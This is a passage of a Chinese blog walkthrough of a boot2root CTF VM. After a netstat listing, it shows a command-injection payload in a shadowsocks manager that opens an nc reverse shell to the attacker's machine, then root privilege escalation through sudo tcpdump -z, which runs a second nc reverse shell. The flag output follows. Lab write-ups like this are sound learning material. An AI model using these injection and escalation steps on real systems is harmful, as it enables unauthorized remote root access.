unix  2      [ ACC ]     STREAM     LISTENING     15040    /run/lvm/lvmetad.socket
unix  2      [ ACC ]     STREAM     LISTENING     18124    /var/run/pcscd/pcscd.comm
unix  2      [ ACC ]     STREAM     LISTENING     18128    /var/run/cups/cups.sock
unix  2      [ ACC ]     STREAM     LISTENING     18131    /run/dbus/system_bus_socket
unix  2      [ ACC ]     STREAM     LISTENING     18135    /var/run/secrets.socket
unix  2      [ ACC ]     STREAM     LISTENING     18138    /run/avahi-daemon/socket
unix  2      [ ACC ]     STREAM     LISTENING     19949    /var/run/abrt/abrt.socket
unix  3      [ ]         STREAM     CONNECTED     19880
unix  3      [ ]         DGRAM                    15909    
unix  2      [ ]         DGRAM                    18520    
unix  3      [ ]         STREAM     CONNECTED     20386    
unix  2      [ ]         DGRAM                    19864    
unix  3      [ ]         STREAM     CONNECTED     18518    /run/systemd/journal/stdout
unix  2      [ ]         DGRAM                    19847    
unix  3      [ ]         STREAM     CONNECTED     18517    
unix  3      [ ]         STREAM     CONNECTED     36571    
unix  3      [ ]         STREAM     CONNECTED     16017    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     18287    
unix  3      [ ]         DGRAM                    11904    
unix  2      [ ]         DGRAM                    19869    
unix  2      [ ]         DGRAM                    15885    
unix  3      [ ]         STREAM     CONNECTED     18288    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     19861    
unix  3      [ ]         STREAM     CONNECTED     15880    
unix  2      [ ]         DGRAM                    15418    
unix  3      [ ]         DGRAM                    11905    
unix  3      [ ]         STREAM     CONNECTED     20483    /run/systemd/journal/stdout
unix  3      [ ]         DGRAM                    15908    
unix  3      [ ]         STREAM     CONNECTED     19299    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     36243    
unix  3      [ ]         STREAM     CONNECTED     19862    
unix  3      [ ]         STREAM     CONNECTED     19107    
unix  3      [ ]         STREAM     CONNECTED     36568    
unix  3      [ ]         STREAM     CONNECTED     19180    
unix  3      [ ]         STREAM     CONNECTED     36570    
unix  3      [ ]         STREAM     CONNECTED     19298    
unix  3      [ ]         STREAM     CONNECTED     19992    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     19181    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     20482    
unix  3      [ ]         DGRAM                    19033    
unix  2      [ ]         DGRAM                    20133    
unix  3      [ ]         STREAM     CONNECTED     19108    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     36569    
unix  2      [ ]         DGRAM                    19447    
unix  3      [ ]         DGRAM                    19034    
unix  2      [ ]         DGRAM                    19757    
unix  2      [ ]         STREAM     CONNECTED     36242    
unix  3      [ ]         STREAM     CONNECTED     20387    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     18953    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     18883
unix  3      [ ]         STREAM     CONNECTED     20828    
unix  3      [ ]         STREAM     CONNECTED     19025
unix  3      [ ]         STREAM     CONNECTED     20829    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     18952    
unix  3      [ ]         STREAM     CONNECTED     21374    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     19546    
unix  3      [ ]         STREAM     CONNECTED     21373
unix  3      [ ]         STREAM     CONNECTED     18884    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     23724
unix  3      [ ]         STREAM     CONNECTED     19990    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     23727    
unix  3      [ ]         STREAM     CONNECTED     19987    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     23757    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     18741    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     23771    /run/user/1001/bus
unix  3      [ ]         STREAM     CONNECTED     19989    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     18739
unix  3      [ ]         STREAM     CONNECTED     23756
unix  3      [ ]         STREAM     CONNECTED     18672
unix  3      [ ]         STREAM     CONNECTED     23770    /run/user/1001/bus
unix  3      [ ]         STREAM     CONNECTED     18673    /run/systemd/journal/stdout
unix  3      [ ]         DGRAM                    22799
unix  3      [ ]         STREAM     CONNECTED     23147    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     22802
unix  3      [ ]         DGRAM                    22798
unix  3      [ ]         STREAM     CONNECTED     22967
unix  3      [ ]         STREAM     CONNECTED     19951
unix  2      [ ]         DGRAM                    21514
unix  3      [ ]         STREAM     CONNECTED     19908
unix  3      [ ]         STREAM     CONNECTED     36245
unix  3      [ ]         STREAM     CONNECTED     20577
unix  2      [ ]         DGRAM                    22418
unix  3      [ ]         STREAM     CONNECTED     36246
unix  3      [ ]         STREAM     CONNECTED     20718    /run/dbus/system_bus_socket
unix  2      [ ]         DGRAM                    19892
unix  3      [ ]         STREAM     CONNECTED     21483    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     36572
unix  3      [ ]         STREAM     CONNECTED     19991    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     21482
unix  3      [ ]         STREAM     CONNECTED     20717
unix  3      [ ]         STREAM     CONNECTED     36244
unix  3      [ ]         STREAM     CONNECTED     22803    /run/dbus/system_bus_socket
unix  2      [ ]         DGRAM                    21232
unix  3      [ ]         STREAM     CONNECTED     22388    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     20578    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     22387
unix  3      [ ]         STREAM     CONNECTED     36573
unix  2      [ ]         DGRAM                    22610
unix  3      [ ]         STREAM     CONNECTED     17953
unix  2      [ ]         DGRAM                    17951
unix  2      [ ]         DGRAM                    22455
unix  2      [ ]         DGRAM                    15229
unix  3      [ ]         STREAM     CONNECTED     18145
unix  3      [ ]         STREAM     CONNECTED     18216    /run/systemd/journal/stdout
unix  3      [ ]         STREAM     CONNECTED     23769
unix  3      [ ]         STREAM     CONNECTED     19986    /run/dbus/system_bus_socket
unix  3      [ ]         STREAM     CONNECTED     18215
unix  3      [ ]         STREAM     CONNECTED     23768
unix  3      [ ]         STREAM     CONNECTED     17952
unix  3      [ ]         STREAM     CONNECTED     19984
unix  3      [ ]         STREAM     CONNECTED     19993    /run/dbus/system_bus_socket
unix  2      [ ]         DGRAM                    19957
unix  3      [ ]         STREAM     CONNECTED     19979
unix  3      [ ]         STREAM     CONNECTED     19985
  • 发现 8612 这个端口,看起来像小飞机的端口。

第二次 nc 反弹

发现是 ss 的端口,可以通过再次反弹的方式利用。

1

$ nc -vlp 8125
  • 新建一个 nc 监听。
1
2
3

[nodeadmin@localhost ~]$ nc -u 127.0.0.1 8839
nc -u 127.0.0.1 8839
add: {"server_port":8003, "password":"test", "method":"|| nc -e /bin/sh 192.168.1.122 8125 ||"}
  • 给 ss 添加一个远程的 nc
1

connect to [192.168.1.122] from (UNKNOWN) [192.168.1.185] 59280
  • 连接成功。
1

python -c 'import pty;pty.spawn("/bin/bash")'
  • 切换 ssh 命令模式。
1
2
3

[fireman@localhost root]$ pwd
pwd
/root
  • 查看目录权限,并无权限。
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

fireman@localhost tmp]$ cd /home
cd /home
[fireman@localhost home]$ ls
ls
fireman  nodeadmin
[fireman@localhost home]$ cd fireman
cd fireman
[fireman@localhost ~]$ ls
ls
[fireman@localhost ~]$ ls -la
ls -la
total 44
drwx------  6 fireman fireman 4096 Jun  7 23:10 .
drwxr-xr-x. 4 root    root    4096 Jun  2 23:02 ..
-rw-------  1 fireman fireman 2151 Jun  7 22:33 .bash_history
-rw-r--r--  1 fireman fireman   18 Mar 15  2018 .bash_logout
-rw-r--r--  1 fireman fireman  193 Mar 15  2018 .bash_profile
-rw-r--r--  1 fireman fireman  231 Mar 15  2018 .bashrc
drwx------  3 fireman fireman 4096 Jun  3 01:12 .config
-rw-------  1 fireman fireman   16 Jun  3 01:12 .esd_auth
drwxr-xr-x  4 fireman fireman 4096 Apr 25  2018 .mozilla
drwxrwxr-x  2 fireman fireman 4096 Jun  3 01:55 .shadowsocks
drwx------  2 fireman fireman 4096 Jun  2 22:39 .ssh
[fireman@localhost ~]$ udo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
<eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
bash: udo: command not found
[fireman@localhost ~]$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
<eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
16 packets received by filter
0 packets dropped by kernel
  • 切换自 fireman 用户目录,成功列目录。

第三次 nc 反弹

然后我使用了各种提权工具,均无解,搜索了下,发现可以通过一下姿势提权。

1

$ nc -vlp 8128
  • 再新建一个 nc 监听。
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

touch /tmp/exploit
[fireman@localhost tmp]$ chmod +x /tmp/exploit
chmod +x /tmp/exploit
[fireman@localhost tmp]$ echo "id" > /tmp/exploit
echo "id" > /tmp/exploit
[fireman@localhost tmp]$ /tmp/exploit
/tmp/exploit
uid=1002(fireman) gid=1002(fireman) groups=1002(fireman)
[fireman@localhost tmp]$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
<eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
11 packets received by filter
0 packets dropped by kernel
[fireman@localhost tmp]$ uid=0(root) gid=0(root) groups=0(root)
echo "nc -e /bin/bash 192.168.1.122 8128" > /tmp/exploit
<c -e /bin/bash 192.168.1.122 8128" > /tmp/exploit
[fireman@localhost tmp]$ echo "nc -e /bin/bash 192.168.1.122 8128" > /tmp/exploit
<c -e /bin/bash 192.168.1.122 8128" > /tmp/exploit
[fireman@localhost tmp]$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
<eth0 -w /dev/null -W 1 -G 1 -z /tmp/exploit -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
10 packets received by filter
0 packets dropped by kernel
  • 通过 tcpdump 在 tmp 目录生成一个 exp,通过这个 exp 反弹 nc。
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60

$ nc -vlp 8128
listening on [any] 8128 ...
192.168.1.185: inverse host lookup failed: Unknown host
connect to [192.168.1.122] from (UNKNOWN) [192.168.1.185] 42510
python -c 'import pty;pty.spawn("/bin/bash")'
[root@localhost tmp]## ls -la
ls -la
total 8
drwxrwxrwt  11 root      root       240 Oct 30 13:13 .
dr-xr-xr-x. 18 root      root      4096 May 30 18:43 ..
drwx------   2 root      root        60 Oct 30 12:41 .esd-0
drwx------   2 nodeadmin nodeadmin   60 Oct 30 12:41 .esd-1001
-rwxrwxr-x   1 fireman   fireman     37 Oct 30 13:16 exploit
drwxrwxrwt   2 root      root        40 Oct 30 12:41 .font-unix
drwxrwxrwt   2 root      root        40 Oct 30 12:41 .ICE-unix
drwx------   3 root      root        60 Oct 30 12:41 systemd-private-2694d3f2b22d4bf79fa7f1fde8306c46-chronyd.service-LubNt8
drwx------   3 root      root        60 Oct 30 12:41 systemd-private-2694d3f2b22d4bf79fa7f1fde8306c46-rtkit-daemon.service-UMqu6w
drwxrwxrwt   2 root      root        40 Oct 30 12:41 .Test-unix
drwxrwxrwt   2 root      root        40 Oct 30 12:41 .X11-unix
drwxrwxrwt   2 root      root        40 Oct 30 12:41 .XIM-unix
[root@localhost tmp]## cd
cd
[root@localhost ~]## ls
ls
flag.txt
[root@localhost ~]## cat flag.txt
cat flag.txt
[+] You're a soldier.
[+] One of the best that the world could set against
[+] the demonic invasion.  

+-----------------------------------------------------------------------------+
| |       |\              -~ /     \  /          |
|~~__     | \            | \/       /\          /|
|    --   |  \           | / \    /    \     /   |
|      |~_|   \      \___|/    \/         /      |
|--__  |   -- |\________________________________/~~\~~|    /  \     /     \   |
|   |~~--__  |~_|____|____|____|____|____|____|/ /  \/|\ /      \/          \/|
|   |      |~--_|__|____|____|____|____|____|_/ /|    |/ \    /   \       /   |
|___|______|__|_||____|____|____|____|____|__[]/_|----|    \/       \  /      |
|  \mmmm :   | _|___|____|____|____|____|____|___|  /\|   /  \      /  \      |
|      B :_--~~ |_|____|____|____|____|____|____|  |  |\/      \ /        \   |
|  __--P :  |  /   /  /  | \     /  \          /\|
|~~  |   :  | /    ~~~   |  \  /      \      /   |
|    |      |/                        .-.             |  /\          \  /     |
|    |      /                        |   |            |/   \          /\      |
|    |     /                        |     |            -_   \       /    \    |
+-----------------------------------------------------------------------------+
|          |  /|  |   |  2  3  4  | /~~~~~\ |       /|    |_| ....  ......... |
|          |  ~|~ | % |           | | ~J~ | |       ~|~ % |_| ....  ......... |
|   AMMO   |  HEALTH  |  5  6  7  |  \===/  |    ARMOR    |#| ....  ......... |
+-----------------------------------------------------------------------------+
            
		FLAG: kre0cu4jl4rzjicpo1i7z5l1

[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.

[+] You can follow me on twitter: @0katz

[+] Thanks to the homie: @Pink_P4nther
  • 反弹成功,切换到 root 目录,查看最终的 flag。

更改密码

也可以输入 sudo passwd root 更改密码,直接最高权限登录。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

$ ssh [email protected]
[email protected]'s password:
Last login: Tue Oct 30 13:52:06 2018 from 192.168.123.122
[root@localhost ~]## ls
flag.txt
[root@localhost ~]## cat flag.txt
[+] You're a soldier. 
[+] One of the best that the world could set against
[+] the demonic invasion.  

+-----------------------------------------------------------------------------+
| |       |\              -~ /     \  /          |
|~~__     | \            | \/       /\          /|
|    --   |  \           | / \    /    \     /   |
|      |~_|   \      \___|/    \/         /      |
|--__  |   -- |\________________________________/~~\~~|    /  \     /     \   |
|   |~~--__  |~_|____|____|____|____|____|____|/ /  \/|\ /      \/          \/|
|   |      |~--_|__|____|____|____|____|____|_/ /|    |/ \    /   \       /   |
|___|______|__|_||____|____|____|____|____|__[]/_|----|    \/       \  /      |
|  \mmmm :   | _|___|____|____|____|____|____|___|  /\|   /  \      /  \      |
|      B :_--~~ |_|____|____|____|____|____|____|  |  |\/      \ /        \   |
|  __--P :  |  /   /  /  | \     /  \          /\|
|~~  |   :  | /    ~~~   |  \  /      \      /   |
|    |      |/                        .-.             |  /\          \  /     |
|    |      /                        |   |            |/   \          /\      |
|    |     /                        |     |            -_   \       /    \    |
+-----------------------------------------------------------------------------+
|          |  /|  |   |  2  3  4  | /~~~~~\ |       /|    |_| ....  ......... |
|          |  ~|~ | % |           | | ~J~ | |       ~|~ % |_| ....  ......... |
|   AMMO   |  HEALTH  |  5  6  7  |  \===/  |    ARMOR    |#| ....  ......... |
+-----------------------------------------------------------------------------+

		FLAG: kre0cu4jl4rzjicpo1i7z5l1     

[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.

[+] You can follow me on twitter: @0katz

[+] Thanks to the homie: @Pink_P4nther

练习心得

这个环境相对较难,很考验耐心和经验,一共 nc 反弹三次,说实话我花了几个小时才搞定,中途搜索多次,也学习到了一些新的姿势。

分享
您的鼓励是我最大的动力
bitcoin QR Code
icekam
作者
IceKam
茶艺品鉴砖家,低端码字人口。

相关内容

总访客 ...
总浏览 ...

©2018 - 2024, IceKam All Rights Reserved